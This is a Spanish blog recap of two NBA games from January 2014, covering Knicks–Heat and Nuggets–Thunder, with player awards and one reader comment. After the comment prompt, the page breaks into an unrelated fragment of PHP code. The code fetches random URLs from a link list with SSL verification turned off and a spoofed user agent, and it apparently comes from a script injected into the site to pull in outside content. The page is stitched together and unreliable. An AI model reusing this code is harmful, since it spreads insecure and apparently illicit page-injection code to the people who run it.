La Crónica: Caminos paralelos

10 de January de 2014 por TheDeerHunter

Noche de jueves con únicamente dos partidos. Ambos fueron sorprendentes victorias locales para dos equipos particularmente irregulares y decepcionantes esta temporada pero que amenazan zona de playoffs gracias a su última racha victoriosa.

Los campeones sucumbieron en lo que pudo ser la mejor noche del curso en el Madison Square Garden. Los Knicks cuajaron una extraordinaria segunda parte de la mano de Carmelo, Bargnani y Stoudemire desde el banco. Eso sin Chandler, Udrih y con J.R. Smith castigado por su mala cabeza en el fondo del banquillo y con muchas papeletas para ser traspasado. Los Heat no tuvieron su día, sobre todo defensivamente. También naufragaron bajo tableros y no pudieron usar sus demoledores contragolpes. Además, la baja de Chalmers también se notó en el ataque estático. Sólo LeBron y Wade aportaron, aunque este último falló los 6 tiros libres que intentó (92-102). Como decimos. los Knicks se ponen únicamente a una victoria del 40% que marca la zona de playoffs en la conferencia.

En el Oeste los Nuggets tocan cumbre en su personal montaña rusa de campaña. La victoria se fraguó en unos 3 primeros cuartos devastadores, ante una defensa de los Thunder que también ha conocido mejores noches. Ty Lawson dio más asistencias que todo el equipo rival y Foye y Fournier estuvieron especialmente inspirados desde la larga distancia. Los Nuggets también vencieron en la batalla bajo los tableros ayudados por el terrorífico acierto de Thunder, donde ni Durant estuvo fino. Partido para olvidar del equipo de Brooks y Denver que se coloca noveno, acariciando la vuelta a la zona noble (88-101).

PREMIOS

MVP: Carmelo Anthony lideró a los Knicks con 29 puntos, 5 asistencias y 8 rebotes ala victoria frente los Heat. Ty Lawson hizo lo propio con 16 puntos, 14 asistencias y 7 rebotes, pero esta vez para imponerse a los Thunder.

Rookie: Turno para dos rookies más que correctos a los que le auguramos una larga carrera en la NBA. Tim Hardaway Jr. anotó 5 puntos (no os perdáis su mate sobre Ray Allen en el TOP-5) mientras que Steven Adams se quedó en 3 pero cogió 5 rebotes. De todas maneras el mejor del día fue Andre Roberson, de los Thunder, que anotó 5 puntos, capturó 6 rebotes, puso un gorro y robó un balón.

Sorpresa: Vaya dos partidos que ha encadenado Randy Foye. Si hace un par de días anotó 7 triples ante los Celtics, ayer se cascó 6 de 9. Acabó el partido con 24 puntos. Su compañero Evan Fournier vivió también una gran anoche al anotar 19 puntos en 18 minutos.

Decepción: Jeremy Lamb sólo fue capaz de anotar 1 de sus 12 lanzamientos a canasta. Nate Robinson lo hizo algo mejor pero falló los 6 triples que intentó.

Esfuerzo en vano: Lebron James y Kevin Durant no suelen verse por estos lares y menos el mismo día. El de los Heat acabó con 32 puntos, 6 asistencias y 5 rebotes mientras que el de los Thunder se “quedó” en 30 puntos, 4 asistencias y 3 rebotes.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. rumbero dice:
    #1

    Lo mejor que ha hecho Woodson en lo que va de curso (de largo) es dejar a JR en el banquillo. Y no sólo porque sea el peor tirador de toda la NBA y le de igual a la hora de elegir sus lanzamientos sino por esa actitud que provoca que esté más pendiente de desabrochar los cordones al Marion de turno que de jugar como debe.
    Bien ayer los Knicks que por momentos, por circulación y actitud defensiva, se parecieron un poquito a la mejor versión de la pasada temporada. Muy fan de Hardaway por cierto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>